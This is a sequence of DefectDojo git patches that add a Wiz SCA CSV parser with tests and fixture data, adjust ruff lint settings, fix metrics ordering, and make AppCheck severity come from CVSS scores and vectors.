Subject: [PATCH 15/62] Wiz Parser: Add SCA parser and fortify old format (#10905)

* Wiz Parser: Add SCA parser and fortify old format

* Adding unit tests

* Fix ruff
---
 dojo/settings/.settings.dist.py.sha256sum | 2 +-
 dojo/settings/settings.dist.py | 2 +-
 dojo/tools/wiz/parser.py | 256 ++++++++++++++++------
 unittests/scans/wiz/sca_format.csv | 6 +
 unittests/tools/test_wiz_parser.py | 60 ++++-
 5 files changed, 254 insertions(+), 72 deletions(-)
 create mode 100644 unittests/scans/wiz/sca_format.csv

diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum
index b6e48ee437c..38c8e498527 100644
--- a/dojo/settings/.settings.dist.py.sha256sum
+++ b/dojo/settings/.settings.dist.py.sha256sum
@@ -1 +1 @@
-1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c
+702d74c8bc703d11c03cf5b3f7c4319ad0cdeaef68db6426d1112c59e59365a6
diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py
index 41f0631fa43..bd33f7fed8a 100644
--- a/dojo/settings/settings.dist.py
+++ b/dojo/settings/settings.dist.py
@@ -1496,7 +1496,7 @@ def saml2_attrib_map_format(dict):
 "OSV Scan": DEDUPE_ALGO_HASH_CODE,
 "Nosey Parker Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE,
 "Bearer CLI": DEDUPE_ALGO_HASH_CODE,
- "Wiz Scan": DEDUPE_ALGO_HASH_CODE,
+ "Wiz Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE,
 "Deepfence Threatmapper Report": DEDUPE_ALGO_HASH_CODE,
 "Kubescape JSON Importer": DEDUPE_ALGO_HASH_CODE,
 "Kiuwan SCA Scan": DEDUPE_ALGO_HASH_CODE,
Scan": DEDUPE_ALGO_HASH_CODE, diff --git a/dojo/tools/wiz/parser.py b/dojo/tools/wiz/parser.py index a68ecae2bbe..f3125544748 100644 --- a/dojo/tools/wiz/parser.py +++ b/dojo/tools/wiz/parser.py @@ -1,91 +1,209 @@ import csv import io +import json +import logging import sys -from dojo.models import Finding +from dateutil import parser as date_parser +from dojo.models import SEVERITIES, Finding, Test -class WizParser: - def get_scan_types(self): - return ["Wiz Scan"] +logger = logging.getLogger(__name__) - def get_label_for_scan_types(self, scan_type): - return "Wiz Scan" - def get_description_for_scan_types(self, scan_type): - return "Wiz scan results in csv file format." +class WizParserByTitle: + """Parser the CSV where the "Title" field is the match for a finding title.""" - def get_findings(self, filename, test): - content = filename.read() - if isinstance(content, bytes): - content = content.decode("utf-8") - csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big - reader = csv.DictReader(io.StringIO(content)) + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: https://github.com/DefectDojo/django-DefectDojo/blob/master/unittests/scans/wiz/multiple_findings.csv + """ findings = [] + description_fields = [ + "Description", + "Resource Type", + "Resource external ID", + "Subscription ID", + "Project IDs", + "Project Names", + "Control ID", + "Resource Name", + "Resource Region", + "Resource Status", + "Resource Platform", + "Resource OS", + "Resource original JSON", + "Issue ID", + "Resource vertex ID", + "Ticket URLs", + "Note", + "Due At", + "Subscription Name", + "Wiz URL", + "Cloud Provider URL", + "Resource Tags", + "Kubernetes Cluster", + "Kubernetes Namespace", + "Container Service", + ] + # Iterate over the objects to create findings for row in reader: if row.get("Status").lower() == "open": - Title = row.get("Title") - Severity = row.get("Severity") - Description = row.get("Description") - Resource_Type = row.get("Resource Type") - Resource_external_ID = row.get("Resource external ID") - Subscription_ID = row.get("Subscription ID") - Project_IDs = row.get("Project IDs") - Project_Names = row.get("Project Names") - Control_ID = row.get("Control ID") - Resource_Name = row.get("Resource Name") - Resource_Region = row.get("Resource Region") - Resource_Status = row.get("Resource Status") - Resource_Platform = row.get("Resource Platform") - Resource_OS = row.get("Resource OS") - Resource_original_JSON = row.get("Resource original JSON") - Issue_ID = row.get("Issue ID") - Resource_vertex_ID = row.get("Resource vertex ID") - Ticket_URLs = row.get("Ticket URLs") - Note = row.get("Note") - Due_At = row.get("Due At") - Subscription_Name = row.get("Subscription Name") - Wiz_URL = row.get("Wiz URL") - Cloud_Provider_URL = row.get("Cloud Provider URL") - Resource_Tags = row.get("Resource Tags") - Kubernetes_Cluster = row.get("Kubernetes Cluster") - Kubernetes_Namespace = row.get("Kubernetes Namespace") - Container_Service = row.get("Container Service") + title = row.get("Title") + severity = row.get("Severity") + mitigation = row.get("Remediation Recommendation") description = "" - description += "**Description**: " + Description + "\n" - description += "**Resource Type**: " + Resource_Type + "\n" - description += "**external ID**: " + Resource_external_ID + "\n" - description += "**Subscription ID**: " + Subscription_ID + "\n" - description += "**Project IDs**: " + 
Project_IDs + "\n" - description += "**Project Names**: " + Project_Names + "\n" - description += "**Control ID**: " + Control_ID + "\n" - description += "**Resource Name**: " + Resource_Name + "\n" - description += "**Resource Region**: " + Resource_Region + "\n" - description += "**Resource Status**: " + Resource_Status + "\n" - description += "**Resource Platform**: " + Resource_Platform + "\n" - description += "**Resource OS**: " + Resource_OS + "\n" - description += "**original JSON**: " + Resource_original_JSON + "\n" - description += "**Issue ID**: " + Issue_ID + "\n" - description += "**vertex ID**: " + Resource_vertex_ID + "\n" - description += "**Ticket URLs**: " + Ticket_URLs + "\n" - description += "**Note**: " + Note + "\n" - description += "**Due At**: " + Due_At + "\n" - description += "**Subscription Name**: " + Subscription_Name + "\n" - description += "**Wiz URL**: " + Wiz_URL + "\n" - description += "**Provider URL**: " + Cloud_Provider_URL + "\n" - description += "**Resource Tags**: " + Resource_Tags + "\n" - description += "**Kubernetes Cluster**: " + Kubernetes_Cluster + "\n" - description += "**Kubernetes Namespace**: " + Kubernetes_Namespace + "\n" - description += "**Container Service**: " + Container_Service + "\n" + # Iterate over the description fields to create the description + for field in description_fields: + if (field_value := row.get(field)) is not None and len(field_value) > 0: + description += f"**{field}**: {field_value}\n" + # Create the finding object findings.append( Finding( - title=Title, + title=title, description=description, - severity=Severity.lower().capitalize(), + severity=severity.lower().capitalize(), static_finding=False, dynamic_finding=True, - mitigation=row.get("Remediation Recommendation"), + mitigation=mitigation, test=test, ), ) return findings + + +class WizParserByDetailedName: + """Parser the CSV where the "DetailedName" and "Name" fields are the match for a finding title.""" + + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: Coming soon! 
+ """ + findings = [] + description_fields = { + "WizURL": "Wiz URL", + "HasExploit": "Has Exploit", + "HasCisaKevExploit": "Has Cisa Kev Exploit", + "LocationPath": "Location Path", + "Version": "Version", + "DetectionMethod": "Detection Method", + "Link": "Link", + "Projects": "Projects", + "AssetID": "Asset ID", + "AssetName": "Asset Name", + "AssetRegion": "Asset Region", + "ProviderUniqueId": "Provider Unique Id", + "CloudProviderURL": "Cloud Provider URL", + "CloudPlatform": "Cloud Platform", + "SubscriptionExternalId": "Subscription External Id", + "SubscriptionId": "Subscription Id", + "SubscriptionName": "Subscription Name", + "ExecutionControllers": "Execution Controllers", + "ExecutionControllersSubscriptionExternalIds": "Execution Controllers Subscription External Ids", + "ExecutionControllersSubscriptionNames": "Execution Controllers Subscription Names", + "OperatingSystem": "Operating System", + "IpAddresses": "Ip Addresses", + } + mitigation_fields = { + "LocationPath": "Location Path", + "FixedVersion": "Fixed Version", + "Remediation": "Remediation", + } + + for row in reader: + # Common fields + vulnerability_id = row.get("Name") + package_name = row.get("DetailedName") + package_version = row.get("Version") + severity = row.get("VendorSeverity") + finding_id = row.get("ID") + + description = self._construct_string_field(description_fields, row) + mitigation = self._construct_string_field(mitigation_fields, row) + status_dict = self._convert_status(row) + # Create the finding object + finding = Finding( + title=f"{package_name}: {vulnerability_id}", + description=description, + mitigation=mitigation, + severity=self._validate_severities(severity), + static_finding=True, + unique_id_from_tool=finding_id, + component_name=package_name, + component_version=package_version, + date=date_parser.parse(row.get("FirstDetected")), + test=test, + **status_dict, + ) + finding.unsaved_vulnerability_ids = [vulnerability_id] + finding.unsaved_tags = self._parse_tags(row.get("Tags", "[]")) + findings.append(finding) + return findings + + def _construct_string_field(self, fields: dict[str, str], row: dict) -> str: + """Construct a formatted string based on the fields dict supplied.""" + return_string = "" + for field, pretty_field in fields.items(): + if (field_value := row.get(field)) is not None and len(field_value) > 0: + return_string += f"**{pretty_field}**: `{field_value}`\n" + return return_string + + def _parse_tags(self, tags: str) -> list[str]: + """parse the Tag string dict, and convert to a list of strings. + + The format of the tags is is "{""key"":""value""}" format + """ + # Convert the string to a dict + tag_dict = json.loads(tags) + return [f"{key}: {value}" for key, value in tag_dict.items()] + + def _validate_severities(self, severity: str) -> str: + """Ensure the supplied severity fits what DefectDojo is expecting.""" + if severity not in SEVERITIES: + logger.error(f"Severity is not supported: {severity}") + # Default to Info severity + return "Info" + return severity + + def _convert_status(self, row: dict) -> dict: + """Convert the "FindingStatus" column to a dict of Finding statuses. + + - Open-> Active = True + - Other statuses that may exist... 
+ """ + if (status := row.get("FindingStatus")) is not None: + if status == "Open": + return {"active": True} + # Return the default status of active + return {"active": True} + + +class WizParser( + WizParserByTitle, + WizParserByDetailedName, +): + def get_scan_types(self): + return ["Wiz Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Wiz Scan" + + def get_description_for_scan_types(self, scan_type): + return "Wiz scan results in csv file format." + + def get_findings(self, filename, test): + content = filename.read() + if isinstance(content, bytes): + content = content.decode("utf-8") + csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big + reader = csv.DictReader(io.StringIO(content)) + # Determine which parser to use + if "Title" in reader.fieldnames: + return WizParserByTitle().parse_findings(test, reader) + if all(field in reader.fieldnames for field in ["Name", "DetailedName"]): + return WizParserByDetailedName().parse_findings(test, reader) + else: + msg = "This CSV format of Wiz is not supported" + raise ValueError(msg) diff --git a/unittests/scans/wiz/sca_format.csv b/unittests/scans/wiz/sca_format.csv new file mode 100644 index 00000000000..c77dd7ea799 --- /dev/null +++ b/unittests/scans/wiz/sca_format.csv @@ -0,0 +1,6 @@ +ID,WizURL,Name,CVSSSeverity,HasExploit,HasCisaKevExploit,FindingStatus,VendorSeverity,FirstDetected,LastDetected,ResolvedAt,ResolutionReason,Remediation,LocationPath,DetailedName,Version,FixedVersion,DetectionMethod,Link,Projects,AssetID,AssetName,AssetRegion,ProviderUniqueId,CloudProviderURL,CloudPlatform,Status,SubscriptionExternalId,SubscriptionId,SubscriptionName,Tags,ExecutionControllers,ExecutionControllersSubscriptionExternalIds,ExecutionControllersSubscriptionNames,CriticalRelatedIssuesCount,HighRelatedIssuesCount,MediumRelatedIssuesCount,LowRelatedIssuesCount,InfoRelatedIssuesCount,OperatingSystem,IpAddresses +3ea99668-721f-11ef-94e9-bb8aaa280b32,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea99668-721f-11ef-94e9-bb8aaa280b32*2cSECURITY_TOOL_FINDING)),CVE-2024-39474,Low,false,false,Open,Low,2024-08-28T03:02:01Z,2024-08-07T12:27:01Z,,,go get -u github.com/containerd/containerd,/home/kubernetes/bin/containerd-gcfs-grpc,github.com/containerd/containerd,1.4.0,1.5.11,Library,https://github.com/advisories/GHSA-c9cp-9c75-9v8c,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:27:11Z,,,go get -u k8s.io/apimachinery,/home/kubernetes/bin/log-counter,k8s.io/apimachinery,0.17.2,0.17.9,Library,https://github.com/advisories/GHSA-33c5-9fx5-fvjm,MyProject; 
Ops_k8s,d44b822c-7223-11ef-abf8-d719c8dbc602,k8s-bigcorp-default-zone-a0930315-p21b,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.15 +3eaa0422-721f-11ef-b00a-c772bc38a673,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3eaa0422-721f-11ef-b00a-c772bc38a673*2cSECURITY_TOOL_FINDING)),GHSA-c9cp-9c75-9v8c,Medium,false,false,Open,Medium,2024-08-28T05:52:53Z,2024-08-07T12:27:01Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea965b2-721f-11ef-8a61-83124251d18e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea965b2-721f-11ef-8a61-83124251d18e*2cSECURITY_TOOL_FINDING)),CVE-2020-8559,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.83,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-83_,MyProject; Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 +3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; 
Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 diff --git a/unittests/tools/test_wiz_parser.py b/unittests/tools/test_wiz_parser.py index 9d72c594126..a2d3975e4e9 100644 --- a/unittests/tools/test_wiz_parser.py +++ b/unittests/tools/test_wiz_parser.py @@ -40,5 +40,63 @@ def test_multiple_findings(self): self.assertEqual("Unusual activity by a principal from previously unseen country", finding.title) self.assertEqual("High", finding.severity) finding = findings[20] - self.assertEqual("User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title) + self.assertEqual( + "User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title, + ) self.assertEqual("Informational", finding.severity) + + def test_sca_format(self): + with open("unittests/scans/wiz/sca_format.csv", encoding="utf-8") as testfile: + parser = WizParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(5, len(findings)) + + finding = findings[0] + self.assertEqual("github.com/containerd/containerd: CVE-2024-39474", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual("github.com/containerd/containerd", finding.component_name) + self.assertEqual("1.4.0", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-39474", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.mitigation) + + finding = findings[1] + self.assertEqual("k8s.io/apimachinery: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("k8s.io/apimachinery", finding.component_name) + self.assertEqual("0.17.2", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.mitigation) + + finding = findings[2] + self.assertEqual("kernel: GHSA-c9cp-9c75-9v8c", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("GHSA-c9cp-9c75-9v8c", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[3] + self.assertEqual("kernel: CVE-2020-8559", finding.title) + 
self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2020-8559", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[4] + self.assertEqual("kernel: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) From c71226f4327184c301c57ab011285a9305833201 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:39:44 +0200 Subject: [PATCH 16/62] Ruff: Add C90 (#10892) --- ruff.toml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/ruff.toml b/ruff.toml index bfd276cd709..858824074ea 100644 --- a/ruff.toml +++ b/ruff.toml @@ -28,13 +28,11 @@ exclude = [ ] [lint] -# Enable the pycodestyle (`E`) and Pyflakes (`F`) rules by default. -# Unlike Flake8, Ruff doesn't enable pycodestyle warnings (`W`) or -# McCabe complexity (`C901`) by default. select = [ "F", "E", "W", + "C90", "I", "D3", "UP", @@ -97,4 +95,7 @@ preview = true per-file-ignores = {} [lint.flake8-boolean-trap] -extend-allowed-calls = ["dojo.utils.get_system_setting"] \ No newline at end of file +extend-allowed-calls = ["dojo.utils.get_system_setting"] + +[lint.mccabe] +max-complexity = 70 # value is far from perfect (recommended default is 10). But we will try to decrease it over the time. From 3641886fb20ec54dbe1e0a46992e3ec0954a5ce3 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:56:16 +0200 Subject: [PATCH 17/62] Ruff: Add ruff (#10893) Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- ruff.toml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/ruff.toml b/ruff.toml index 858824074ea..5d3eecbe4d5 100644 --- a/ruff.toml +++ b/ruff.toml @@ -66,6 +66,7 @@ select = [ "PD", "PGH", "PLE", + "PLR0915", "PLW15", "TRY003", "TRY004", @@ -97,5 +98,8 @@ per-file-ignores = {} [lint.flake8-boolean-trap] extend-allowed-calls = ["dojo.utils.get_system_setting"] +[lint.pylint] +max-statements = 234 + [lint.mccabe] max-complexity = 70 # value is far from perfect (recommended default is 10). But we will try to decrease it over the time. 
From 2b1fd3d467ec6158cc5bf7c61418e230b2dc9bfd Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:08:55 -0400 Subject: [PATCH 18/62] Fix metrics aggregation (#10917) * metrics-aggregate-fix add an order_by() to aggregate_counts_by_period() so aggregation works properly * metrics-aggregate-fix replace single quotes with double quotes * retrigger github actions --- dojo/metrics/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 263b7065f2c..8ca345b41f7 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -500,7 +500,7 @@ def aggregate_counts_by_period( ) desired_values += ("closed",) - return severities_by_period.values(*desired_values) + return severities_by_period.order_by("grouped_date").values(*desired_values) def findings_by_product( From 86aeeffbd5747f672f72422b54f384bcd6e34a18 Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:52:06 -0400 Subject: [PATCH 19/62] appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for severity (#10918) * appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for determining severity in that order; update some type hints * appcheck-severity-determination-fix process cvss-base_score-related variables for severity determination first, then fall back to vectors, then default to "Info" * appcheck-severity-determination-fix fix typo --- .../engines/appcheck.py | 2 +- .../engines/base.py | 93 +++++++++++++++---- ...heck_web_application_scanner_many_vul.json | 2 +- ...appcheck_web_application_scanner_parser.py | 35 ++++++- 4 files changed, 107 insertions(+), 25 deletions(-) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py index ffcfa4b5632..ba29a780bc7 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py @@ -27,7 +27,7 @@ def extract_request_response(self, finding: Finding, value: dict[str, [str]]) -> value.pop("Messages") finding.unsaved_request, finding.unsaved_response = (d.strip() for d in rr_details[0]) - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.extract_request_response(finding, value) # super's version adds everything else to the description field return super().parse_details(finding, value) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/base.py b/dojo/tools/appcheck_web_application_scanner/engines/base.py index 2b2f1cc1890..f45fd506698 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/base.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/base.py @@ -5,6 +5,7 @@ import cvss.parser import dateutil.parser from cpe import CPE +from cvss.exceptions import CVSSError from django.core.exceptions import ImproperlyConfigured from dojo.models import Endpoint, Finding @@ -41,6 +42,35 @@ def escape_if_needed(x): return "".join([escape_if_needed(c) for c in s]) +def cvss_score_to_severity(score: float, version: int) -> str: + """ + Maps a CVSS score with a given version to a severity level. 
+ Mapping from https://nvd.nist.gov/vuln-metrics/cvss (modified slightly to have "Info" in range [0.0, 0.1) for CVSS + v3/v4) + """ + cvss_score = float(score) + if version == 2: + if cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + else: + severity = "Low" + else: + if cvss_score >= 9.0: + severity = "Critical" + elif cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + elif cvss_score >= 0.1: + severity = "Low" + else: + severity = "Info" + + return severity + + ####### # Field parsing helper classes ####### @@ -122,7 +152,6 @@ class BaseEngineParser: * status -> active/false_p/risk_accepted (depending on value) * cves -> unsaved_vulnerability_ids (vulnerability_ids) * cpe -> component name/version - * cvss_vector -> severity (determined using CVSS package) * notes -> appended to Finding description * details -> appended to Finding description @@ -143,7 +172,6 @@ class BaseEngineParser: "status": Method("parse_status"), "cves": Method("parse_cves"), "cpe": Method("parse_components"), - "cvss_vector": Method("parse_severity"), # These should be listed after the 'description' entry; they append to it "notes": Method("parse_notes"), "details": Method("parse_details")} @@ -176,7 +204,7 @@ def parse_initial_date(self, finding: Finding, value: str) -> None: def is_cve(self, c: str) -> bool: return bool(c and isinstance(c, str) and self.CVE_PATTERN.fullmatch(c)) - def parse_cves(self, finding: Finding, value: [str]) -> None: + def parse_cves(self, finding: Finding, value: list[str]) -> None: finding.unsaved_vulnerability_ids = [c.upper() for c in value if self.is_cve(c)] ##### @@ -192,19 +220,6 @@ def parse_status(self, finding: Finding, value: str) -> None: elif value == "acceptable_risk": finding.risk_accepted = True - ##### - # For severity (extracted from cvss vector) - ##### - def get_severity(self, value: str) -> Optional[str]: - if cvss_obj := cvss.parser.parse_cvss_from_text(value): - if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES: - return severity - return None - - def parse_severity(self, finding: Finding, value: str) -> None: - if severity := self.get_severity(value): - finding.severity = severity - ##### # For parsing component data ##### @@ -217,7 +232,7 @@ def parse_cpe(self, cpe_str: str) -> (Optional[str], Optional[str]): (cpe_obj.get_version() and cpe_obj.get_version()[0]) or None, ) - def parse_components(self, finding: Finding, value: [str]) -> None: + def parse_components(self, finding: Finding, value: list[str]) -> None: # Only use the first entry finding.component_name, finding.component_version = self.parse_cpe(value[0]) @@ -236,12 +251,12 @@ def append_description(self, finding: Finding, addendum: dict[str, str]) -> None def parse_notes(self, finding: Finding, value: str) -> None: self.append_description(finding, {"Notes": value}) - def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, [str]]]]]) -> dict[str, str]: + def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, list[str]]]]]) -> dict[str, str]: if isinstance(value, dict): return {k: v for k, v in value.items() if k != "_meta"} return {"Details": str(value)} - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.append_description(finding, self.extract_details(value)) ##### @@ -282,6 +297,44 @@ def 
set_endpoints(self, finding: Finding, item: Any) -> None:
 endpoints = self.parse_endpoints(item)
 finding.unsaved_endpoints.extend(endpoints)
+
+ #####
+ # For severity (extracted from various cvss vectors)
+ #####
+ def parse_cvss_vector(self, value: str) -> Optional[str]:
+ # CVSS4 vectors don't parse with the handy-dandy parse method :(
+ try:
+ if (severity := cvss.CVSS4(value).severity) in Finding.SEVERITIES:
+ return severity
+ except CVSSError:
+ pass
+
+ if cvss_obj := cvss.parser.parse_cvss_from_text(value):
+ if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES:
+ return severity
+ return None
+
+ def set_severity(self, finding: Finding, item: Any) -> None:
+ for base_score_entry, cvss_version in [
+ ("cvss_v4_base_score", 4),
+ ("cvss_v3_base_score", 3),
+ ("cvss_base_score", 2),
+ ]:
+ if base_score := item.get(base_score_entry):
+ finding.severity = cvss_score_to_severity(base_score, cvss_version)
+ return
+
+ for vector_type in ["cvss_v4_vector", "cvss_v3_vector", "cvss_vector"]:
+ if vector := item.get(vector_type):
+ if severity := self.parse_cvss_vector(vector):
+ finding.severity = severity
+ return
+
+ finding.severity = "Info"
+
+ def process_whole_item(self, finding: Finding, item: Any) -> None:
+ self.set_severity(finding, item)
